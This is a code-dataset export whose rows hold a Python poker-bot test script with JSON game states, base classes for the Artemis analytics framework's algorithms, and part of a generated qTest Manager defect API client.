hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7947205d7b124abc0236cf35ac8f0d0f3f4d2756
| 5,950
|
py
|
Python
|
test.py
|
czella/poker-player-theempiredidnothingwrong
|
fd064967b9ff37c81a22cb22e72ff086a752e158
|
[
"MIT"
] | null | null | null |
test.py
|
czella/poker-player-theempiredidnothingwrong
|
fd064967b9ff37c81a22cb22e72ff086a752e158
|
[
"MIT"
] | null | null | null |
test.py
|
czella/poker-player-theempiredidnothingwrong
|
fd064967b9ff37c81a22cb22e72ff086a752e158
|
[
"MIT"
] | null | null | null |
import player
import json

# Game-state fixtures for player.Player.betRequest().
# All four describe the same 6-player table; they differ only in our bot's
# hole cards and in how many opponents have "status": "out".
# Our bot is "TheEmpireDidNothingWrong", seated at index 3 ("in_action": 3).

# One high hole card (Q) plus a low card (4); all six players active.
testJSon_one_high = json.loads("""{"community_cards": [],
"minimum_raise": 2,
"big_blind": 4,
"orbits": 0,
"in_action": 3,
"bet_index": 2,
"current_buy_in": 4,
"round": 0,
"players": [{"id": 0, "bet": 0, "version": "Pony 1.0.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Bright Pony"},
{"id": 1, "bet": 2, "version": "1.0", "time_used": 0, "stack": 998, "status": "active", "name": "PokerMasters"},
{"id": 2, "bet": 4, "version": "ERROR: Unreachable", "time_used": 0, "stack": 996, "status": "active", "name": "NADagascar"},
{"hole_cards": [{"suit": "hearts", "rank": "4"},
{"suit": "diamonds", "rank": "Q"}],
"bet": 0,
"version": "DS.1.0.0",
"time_used": 0,
"id": 3,
"stack": 1000,
"status": "active",
"name": "TheEmpireDidNothingWrong"},
{"id": 4,
"bet": 0,
"version": "1.0",
"time_used": 0,
"stack": 1000,
"status": "active",
"name": "Hive"},
{"id": 5, "bet": 0, "version": "Gopnik_FM_ver_1.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Gopnik FM"}],
"small_blind": 2,
"game_id": "5c5d4b96a972e80004000021",
"dealer": 0,
"pot": 6,
"tournament_id": "5c38a553b0fea40004000003"}
""")

# Two high hole cards (J, Q); player 0 is out.
testJSon_two_high = json.loads("""{"community_cards": [],
"minimum_raise": 2,
"big_blind": 4,
"orbits": 0,
"in_action": 3,
"bet_index": 2,
"current_buy_in": 4,
"round": 0,
"players": [{"id": 0, "bet": 0, "version": "Pony 1.0.0", "time_used": 0, "stack": 1000, "status": "out", "name": "Bright Pony"},
{"id": 1, "bet": 2, "version": "1.0", "time_used": 0, "stack": 998, "status": "active", "name": "PokerMasters"},
{"id": 2, "bet": 4, "version": "ERROR: Unreachable", "time_used": 0, "stack": 996, "status": "active", "name": "NADagascar"},
{"hole_cards": [{"suit": "hearts", "rank": "J"},
{"suit": "diamonds", "rank": "Q"}],
"bet": 0,
"version": "DS.1.0.0",
"time_used": 0,
"id": 3,
"stack": 1000,
"status": "active",
"name": "TheEmpireDidNothingWrong"},
{"id": 4,
"bet": 0,
"version": "1.0",
"time_used": 0,
"stack": 1000,
"status": "active",
"name": "Hive"},
{"id": 5, "bet": 0, "version": "Gopnik_FM_ver_1.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Gopnik FM"}],
"small_blind": 2,
"game_id": "5c5d4b96a972e80004000021",
"dealer": 0,
"pot": 6,
"tournament_id": "5c38a553b0fea40004000003"}
""")

# One low + one high card (2, Q); three opponents out.
testJSon_three_out_one_high = json.loads("""{"community_cards": [],
"minimum_raise": 2,
"big_blind": 4,
"orbits": 0,
"in_action": 3,
"bet_index": 2,
"current_buy_in": 4,
"round": 0,
"players": [{"id": 0, "bet": 0, "version": "Pony 1.0.0", "time_used": 0, "stack": 1000, "status": "out", "name": "Bright Pony"},
{"id": 1, "bet": 2, "version": "1.0", "time_used": 0, "stack": 998, "status": "out", "name": "PokerMasters"},
{"id": 2, "bet": 4, "version": "ERROR: Unreachable", "time_used": 0, "stack": 996, "status": "out", "name": "NADagascar"},
{"hole_cards": [{"suit": "hearts", "rank": "2"},
{"suit": "diamonds", "rank": "Q"}],
"bet": 0,
"version": "DS.1.0.0",
"time_used": 0,
"id": 3,
"stack": 1000,
"status": "active",
"name": "TheEmpireDidNothingWrong"},
{"id": 4,
"bet": 0,
"version": "1.0",
"time_used": 0,
"stack": 1000,
"status": "active",
"name": "Hive"},
{"id": 5, "bet": 0, "version": "Gopnik_FM_ver_1.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Gopnik FM"}],
"small_blind": 2,
"game_id": "5c5d4b96a972e80004000021",
"dealer": 0,
"pot": 6,
"tournament_id": "5c38a553b0fea40004000003"}
""")

# Pocket queens (pair of high cards); three opponents out.
testJSon_three_out_two_high = json.loads("""{"community_cards": [],
"minimum_raise": 2,
"big_blind": 4,
"orbits": 0,
"in_action": 3,
"bet_index": 2,
"current_buy_in": 4,
"round": 0,
"players": [{"id": 0, "bet": 0, "version": "Pony 1.0.0", "time_used": 0, "stack": 1000, "status": "out", "name": "Bright Pony"},
{"id": 1, "bet": 2, "version": "1.0", "time_used": 0, "stack": 998, "status": "out", "name": "PokerMasters"},
{"id": 2, "bet": 4, "version": "ERROR: Unreachable", "time_used": 0, "stack": 996, "status": "out", "name": "NADagascar"},
{"hole_cards": [{"suit": "hearts", "rank": "Q"},
{"suit": "diamonds", "rank": "Q"}],
"bet": 0,
"version": "DS.1.0.0",
"time_used": 0,
"id": 3,
"stack": 1000,
"status": "active",
"name": "TheEmpireDidNothingWrong"},
{"id": 4,
"bet": 0,
"version": "1.0",
"time_used": 0,
"stack": 1000,
"status": "active",
"name": "Hive"},
{"id": 5, "bet": 0, "version": "Gopnik_FM_ver_1.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Gopnik FM"}],
"small_blind": 2,
"game_id": "5c5d4b96a972e80004000021",
"dealer": 0,
"pot": 6,
"tournament_id": "5c38a553b0fea40004000003"}
""")

if __name__ == "__main__":
    # FIX: bind the instance to a new name. The original wrote
    # `player = player.Player()`, rebinding (shadowing) the imported
    # `player` module with an instance.
    bot = player.Player()
    print(bot.betRequest(testJSon_one_high))
    print(bot.betRequest(testJSon_two_high))
    print(bot.betRequest(testJSon_three_out_one_high))
    print(bot.betRequest(testJSon_three_out_two_high))
| 39.666667
| 138
| 0.482857
| 666
| 5,950
| 4.145646
| 0.10961
| 0.06954
| 0.078233
| 0.072438
| 0.965954
| 0.963419
| 0.949294
| 0.919594
| 0.919594
| 0.917421
| 0
| 0.09409
| 0.289076
| 5,950
| 149
| 139
| 39.932886
| 0.558629
| 0
| 0
| 0.881944
| 0
| 0.111111
| 0.921513
| 0.055126
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013889
| 0
| 0.013889
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
795b548761b1c07cb92bc8835aaaa00ac9a7d887
| 12,529
|
py
|
Python
|
artemis/core/algo.py
|
artemis-analytics/artemis
|
3e1eebdd4628145ee7d8923567b5e6f53a2e5244
|
[
"Apache-2.0"
] | 4
|
2020-02-29T15:02:05.000Z
|
2021-05-13T18:50:58.000Z
|
artemis/core/algo.py
|
artemis-analytics/artemis
|
3e1eebdd4628145ee7d8923567b5e6f53a2e5244
|
[
"Apache-2.0"
] | 25
|
2020-02-25T19:29:21.000Z
|
2020-04-03T15:06:59.000Z
|
artemis/core/algo.py
|
ryanmwhitephd/artemis
|
3e1eebdd4628145ee7d8923567b5e6f53a2e5244
|
[
"Apache-2.0"
] | 2
|
2021-08-12T09:40:51.000Z
|
2021-08-12T09:42:09.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © Her Majesty the Queen in Right of Canada, as represented
# by the Minister of Statistics Canada, 2019.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Algorithms
"""
from collections import OrderedDict
import importlib
from pprint import pformat
from artemis.logger import Logger
from artemis.core.abcalgo import AbcAlgoBase
from artemis.core.properties import Properties
from artemis.core.gate import ArtemisGateSvc
from artemis.io.protobuf.configuration_pb2 import Module as Algo_pb
from artemis.core.gate import IOMetaMixin, MetaMixin
# TODO Create an interface class to AlgoBase to expose the run,
# finalize methods to framework
# Interface IAlgoBase class to expose the methods to the framework
# (apparently, I should not write a framework, see Fluent Python ...
# I am bored but probably getting paid)
# Concrete implementation of interface with AlgoBase
# Concrete base class provides the mixins or other ABCs
# Likely we want to provide the Job class instance to retrieve
# job.histbook
# job.timers
# job.objectstore
# Inherited classes for user-defined methods MyAlgo
class AlgoBase(MetaMixin, metaclass=AbcAlgoBase):
    """Base class for framework-managed algorithms.

    Provides construction from a configuration dictionary (``load``) or a
    protobuf ``Module`` message (``from_msg``), serialization back to both
    forms (``to_dict`` / ``to_msg``), and the lifecycle hooks
    (``initialize``/``book``/``rebook``/``execute``/``finalize``) that
    concrete algorithms must override.
    """

    def __init__(self, name, **kwargs):
        """
        Access the Base logger directly through self.__logger.
        Derived classes use the classmethods for info, debug, warn, error;
        all formatting, loglevel checks, etc. can be done through the
        classmethods.

        :param name: instance name of the algorithm (as found in the menu)
        :param kwargs: user-defined properties; each becomes an entry in
            ``self.properties`` (logging options are also consumed by
            ``Logger.configure``)
        """
        # Configure logging first so __logger is available below.
        Logger.configure(self, **kwargs)
        self.__logger.debug("__init__ AlgoBase")
        # name will be mangled to _AlgoBase__name
        self.__name = name
        # Every keyword argument is retained as a user-visible property.
        self.properties = Properties()
        for key in kwargs:
            self.properties.add_property(key, kwargs[key])
        self.gate = ArtemisGateSvc()

    def __init_subclass__(cls, **kwargs):
        """
        See PEP 487.
        Essentially acts as a class method decorator.
        """
        super().__init_subclass__(**kwargs)

    @property
    def name(self):
        """Algorithm instance name (read-only)."""
        return self.__name

    @staticmethod
    def load(logger, **kwargs):
        """Return a class instance built from a dictionary.

        Expected keys: ``name``, ``module``, ``class`` and ``properties``.

        :param logger: logger used for progress and error reporting; its
            effective level is propagated to the new instance when the
            properties do not set ``loglevel``
        :raises ImportError: if the module cannot be imported
        :raises AttributeError: if the class or its properties are missing
        """
        logger.info("Loading Algo %s" % kwargs["name"])
        try:
            module = importlib.import_module(kwargs["module"])
        except ImportError:
            logger.error("Unable to load module %s" % kwargs["module"])
            raise
        except Exception as e:
            logger.error("Unknown error loading module: %s" % e)
            raise
        try:
            class_ = getattr(module, kwargs["class"])
        except AttributeError:
            logger.error("%s: missing attribute %s" % (kwargs["name"], kwargs["class"]))
            raise
        except Exception as e:
            logger.error("Reason: %s" % e)
            raise
        logger.debug(pformat(kwargs["properties"]))
        # Update the logging level of algorithms if loglevel not set.
        # Ensures user-defined algos get the artemis level logging.
        if "loglevel" not in kwargs["properties"]:
            kwargs["properties"]["loglevel"] = logger.getEffectiveLevel()
        try:
            instance = class_(kwargs["name"], **kwargs["properties"])
        except AttributeError:
            logger.error("%s: missing attribute %s" % (kwargs["name"], "properties"))
            raise
        except Exception as e:
            # BUG FIX: the two-placeholder format string was applied to the
            # bare exception ("% e"), which itself raised TypeError while
            # reporting the real failure.
            logger.error("%s: Cannot initialize %s" % (kwargs["name"], e))
            raise
        return instance

    def to_dict(self):
        """
        Create a json-serializable dict from which the algorithm can be
        recreated:

        name - instance name as found in menu
        module - where the algo class resides
        class - concrete class name
        properties - all the user-defined properties
        """
        _dict = OrderedDict()
        _dict["name"] = self.name
        _dict["class"] = self.__class__.__name__
        _dict["module"] = self.__module__
        _dict["properties"] = self.properties.to_dict()
        return _dict

    def to_msg(self):
        """Serialize this algorithm to a protobuf ``Module`` message."""
        message = Algo_pb()
        message.name = self.name
        # "class" is a reserved word; the protobuf field is named klass.
        message.klass = self.__class__.__name__
        message.module = self.__module__
        message.properties.CopyFrom(self.properties.to_msg())
        return message

    @staticmethod
    def from_msg(logger, msg):
        """Return a class instance built from a protobuf ``Module`` message.

        Mirrors :meth:`load`, reading name/module/klass/properties from the
        message instead of a dictionary.
        """
        logger.info("Loading Algo from msg %s", msg.name)
        try:
            module = importlib.import_module(msg.module)
        except ImportError:
            logger.error("Unable to load module %s", msg.module)
            raise
        except Exception as e:
            logger.error("Unknown error loading module: %s" % e)
            raise
        try:
            class_ = getattr(module, msg.klass)
        except AttributeError:
            logger.error("%s: missing attribute %s" % (msg.name, msg.klass))
            raise
        except Exception as e:
            logger.error("Reason: %s" % e)
            raise
        properties = Properties.from_msg(msg.properties)
        logger.debug(pformat(properties))
        # Update the logging level of algorithms if loglevel not set.
        # Ensures user-defined algos get the artemis level logging.
        if "loglevel" not in properties:
            properties["loglevel"] = logger.getEffectiveLevel()
        try:
            instance = class_(msg.name, **properties)
        except AttributeError:
            logger.error("%s: missing attribute %s" % (msg.name, "properties"))
            raise
        except Exception as e:
            # BUG FIX: supply both arguments to the format string (see load()).
            logger.error("%s: Cannot initialize %s" % (msg.name, e))
            raise
        return instance

    def lock(self):
        """
        Lock all properties for the algorithm.
        """
        self.properties.lock = True

    def initialize(self):
        """
        Framework initialize. Must be overridden.
        """
        raise NotImplementedError

    def book(self):
        """
        Book histograms. Must be overridden.
        """
        raise NotImplementedError

    def rebook(self):
        """
        Rebook with new binnings. Must be overridden.
        """
        raise NotImplementedError

    def execute(self, payload):
        """
        Algo always accepts the output Node on a graph.
        Data is accessed via the Parent.payload. Must be overridden.
        """
        raise NotImplementedError

    def finalize(self):
        """
        Report timings, counters, etc. Must be overridden.
        """
        raise NotImplementedError
class IOAlgoBase(MetaMixin, IOMetaMixin, metaclass=AbcAlgoBase):
    """Base class for I/O-capable framework-managed algorithms.

    Identical contract to ``AlgoBase`` with the addition of ``IOMetaMixin``:
    construction from a dictionary (``load``) or protobuf message
    (``from_msg``), serialization (``to_dict`` / ``to_msg``), and the
    lifecycle hooks concrete algorithms must override.
    """

    def __init__(self, name, **kwargs):
        """
        Access the Base logger directly through self.__logger.
        Derived classes use the classmethods for info, debug, warn, error;
        all formatting, loglevel checks, etc. can be done through the
        classmethods.

        :param name: instance name of the algorithm (as found in the menu)
        :param kwargs: user-defined properties; each becomes an entry in
            ``self.properties``
        """
        # Configure logging first so __logger is available below.
        Logger.configure(self, **kwargs)
        # FIX: log message said "AlgoBase" (copy-paste from AlgoBase).
        self.__logger.debug("__init__ IOAlgoBase")
        # name will be mangled to _IOAlgoBase__name
        self.__name = name
        # Every keyword argument is retained as a user-visible property.
        self.properties = Properties()
        for key in kwargs:
            self.properties.add_property(key, kwargs[key])
        self.gate = ArtemisGateSvc()

    @property
    def name(self):
        """Algorithm instance name (read-only)."""
        return self.__name

    @staticmethod
    def load(logger, **kwargs):
        """Return a class instance built from a dictionary.

        Expected keys: ``name``, ``module``, ``class`` and ``properties``.

        :raises ImportError: if the module cannot be imported
        :raises AttributeError: if the class or its properties are missing
        """
        logger.info("Loading Algo %s" % kwargs["name"])
        try:
            module = importlib.import_module(kwargs["module"])
        except ImportError:
            logger.error("Unable to load module %s" % kwargs["module"])
            raise
        except Exception as e:
            logger.error("Unknown error loading module: %s" % e)
            raise
        try:
            class_ = getattr(module, kwargs["class"])
        except AttributeError:
            logger.error("%s: missing attribute %s" % (kwargs["name"], kwargs["class"]))
            raise
        except Exception as e:
            logger.error("Reason: %s" % e)
            raise
        logger.debug(pformat(kwargs["properties"]))
        # Update the logging level of algorithms if loglevel not set.
        # Ensures user-defined algos get the artemis level logging.
        if "loglevel" not in kwargs["properties"]:
            kwargs["properties"]["loglevel"] = logger.getEffectiveLevel()
        try:
            instance = class_(kwargs["name"], **kwargs["properties"])
        except AttributeError:
            logger.error("%s: missing attribute %s" % (kwargs["name"], "properties"))
            raise
        except Exception as e:
            # BUG FIX: the two-placeholder format string was applied to the
            # bare exception ("% e"), which itself raised TypeError while
            # reporting the real failure.
            logger.error("%s: Cannot initialize %s" % (kwargs["name"], e))
            raise
        return instance

    def to_dict(self):
        """
        Create a json-serializable dict from which the algorithm can be
        recreated:

        name - instance name as found in menu
        module - where the algo class resides
        class - concrete class name
        properties - all the user-defined properties
        """
        _dict = OrderedDict()
        _dict["name"] = self.name
        _dict["class"] = self.__class__.__name__
        _dict["module"] = self.__module__
        _dict["properties"] = self.properties.to_dict()
        return _dict

    def to_msg(self):
        """Serialize this algorithm to a protobuf ``Module`` message."""
        message = Algo_pb()
        message.name = self.name
        # "class" is a reserved word; the protobuf field is named klass.
        message.klass = self.__class__.__name__
        message.module = self.__module__
        message.properties.CopyFrom(self.properties.to_msg())
        return message

    @staticmethod
    def from_msg(logger, msg):
        """Return a class instance built from a protobuf ``Module`` message.

        Mirrors :meth:`load`, reading name/module/klass/properties from the
        message instead of a dictionary.
        """
        logger.info("Loading Algo from msg %s", msg.name)
        try:
            module = importlib.import_module(msg.module)
        except ImportError:
            logger.error("Unable to load module %s", msg.module)
            raise
        except Exception as e:
            logger.error("Unknown error loading module: %s" % e)
            raise
        try:
            class_ = getattr(module, msg.klass)
        except AttributeError:
            logger.error("%s: missing attribute %s" % (msg.name, msg.klass))
            raise
        except Exception as e:
            logger.error("Reason: %s" % e)
            raise
        properties = Properties.from_msg(msg.properties)
        logger.debug(pformat(properties))
        # Update the logging level of algorithms if loglevel not set.
        # Ensures user-defined algos get the artemis level logging.
        if "loglevel" not in properties:
            properties["loglevel"] = logger.getEffectiveLevel()
        try:
            instance = class_(msg.name, **properties)
        except AttributeError:
            logger.error("%s: missing attribute %s" % (msg.name, "properties"))
            raise
        except Exception as e:
            # BUG FIX: supply both arguments to the format string (see load()).
            logger.error("%s: Cannot initialize %s" % (msg.name, e))
            raise
        return instance

    def lock(self):
        """
        Lock all properties for the algorithm.
        """
        self.properties.lock = True

    def initialize(self):
        """
        Framework initialize. Must be overridden.
        """
        raise NotImplementedError

    def book(self):
        """
        Book histograms. Must be overridden.
        """
        raise NotImplementedError

    def rebook(self):
        """
        Rebook with new binnings. Must be overridden.
        """
        raise NotImplementedError

    def execute(self, payload):
        """
        Algo always accepts the output Node on a graph.
        Data is accessed via the Parent.payload. Must be overridden.
        """
        raise NotImplementedError

    def finalize(self):
        """
        Report timings, counters, etc. Must be overridden.
        """
        raise NotImplementedError
| 30.708333
| 88
| 0.600447
| 1,371
| 12,529
| 5.387309
| 0.185266
| 0.035743
| 0.032494
| 0.035743
| 0.810181
| 0.803412
| 0.803412
| 0.803412
| 0.803412
| 0.803412
| 0
| 0.001618
| 0.309522
| 12,529
| 407
| 89
| 30.783784
| 0.85204
| 0.273685
| 0
| 0.938967
| 0
| 0
| 0.115973
| 0
| 0
| 0
| 0
| 0.002457
| 0
| 1
| 0.117371
| false
| 0
| 0.079812
| 0
| 0.253521
| 0.004695
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
796417e97d6a7fa72201c1a8d5b68b358c909421
| 51,082
|
py
|
Python
|
swagger_client/apis/defect_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 1
|
2019-09-10T17:55:53.000Z
|
2019-09-10T17:55:53.000Z
|
swagger_client/apis/defect_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | null | null | null |
swagger_client/apis/defect_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 2
|
2019-02-12T23:15:10.000Z
|
2022-03-11T20:08:28.000Z
|
# coding: utf-8
"""
qTest Manager API Version 8.6 - 9.1
qTest Manager API Version 8.6 - 9.1
OpenAPI spec version: 8.6 - 9.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DefectApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_comment(self, project_id, id_or_key, body, **kwargs):
"""
Adds a Comment to a Defect
To add a Comment to a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_comment(project_id, id_or_key, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect (required)
:param CommentResource body: The Comment's content (required)
:return: CommentResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_comment_with_http_info(project_id, id_or_key, body, **kwargs)
else:
(data) = self.add_comment_with_http_info(project_id, id_or_key, body, **kwargs)
return data
    def add_comment_with_http_info(self, project_id, id_or_key, body, **kwargs):
        """
        Adds a Comment to a Defect
        To add a Comment to a Defect <strong>qTest Manager version:</strong> 7.5+
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.add_comment_with_http_info(project_id, id_or_key, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int project_id: ID of the project (required)
        :param str id_or_key: PID or ID of the Defect (required)
        :param CommentResource body: The Comment's content (required)
        :return: CommentResource
            If the method is called asynchronously,
            returns the request thread.
        :raises TypeError: on an unexpected keyword argument
        :raises ValueError: when a required parameter is missing or None
        """
        # Keywords accepted in addition to the positional parameters.
        all_params = ['project_id', 'id_or_key', 'body']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here deliberately, so `params` holds
        # exactly the names bound so far (self, the positional args, kwargs,
        # all_params); extra kwargs are then folded in after validation.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method add_comment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'project_id' is set
        if ('project_id' not in params) or (params['project_id'] is None):
            raise ValueError("Missing the required parameter `project_id` when calling `add_comment`")
        # verify the required parameter 'id_or_key' is set
        if ('id_or_key' not in params) or (params['id_or_key'] is None):
            raise ValueError("Missing the required parameter `id_or_key` when calling `add_comment`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `add_comment`")

        collection_formats = {}

        # Endpoint template; {projectId}/{idOrKey} are substituted by the client.
        resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments'.replace('{format}', 'json')
        path_params = {}
        if 'project_id' in params:
            path_params['projectId'] = params['project_id']
        if 'id_or_key' in params:
            path_params['idOrKey'] = params['id_or_key']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        # Request body is the CommentResource payload.
        body_params = None
        if 'body' in params:
            body_params = params['body']

        # Authentication setting
        auth_settings = ['Authorization']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CommentResource',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def delete_comment(self, project_id, id_or_key, comment_id, **kwargs):
"""
Deletes a Comment of a Defect
To delete a specific Comment of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_comment(project_id, id_or_key, comment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
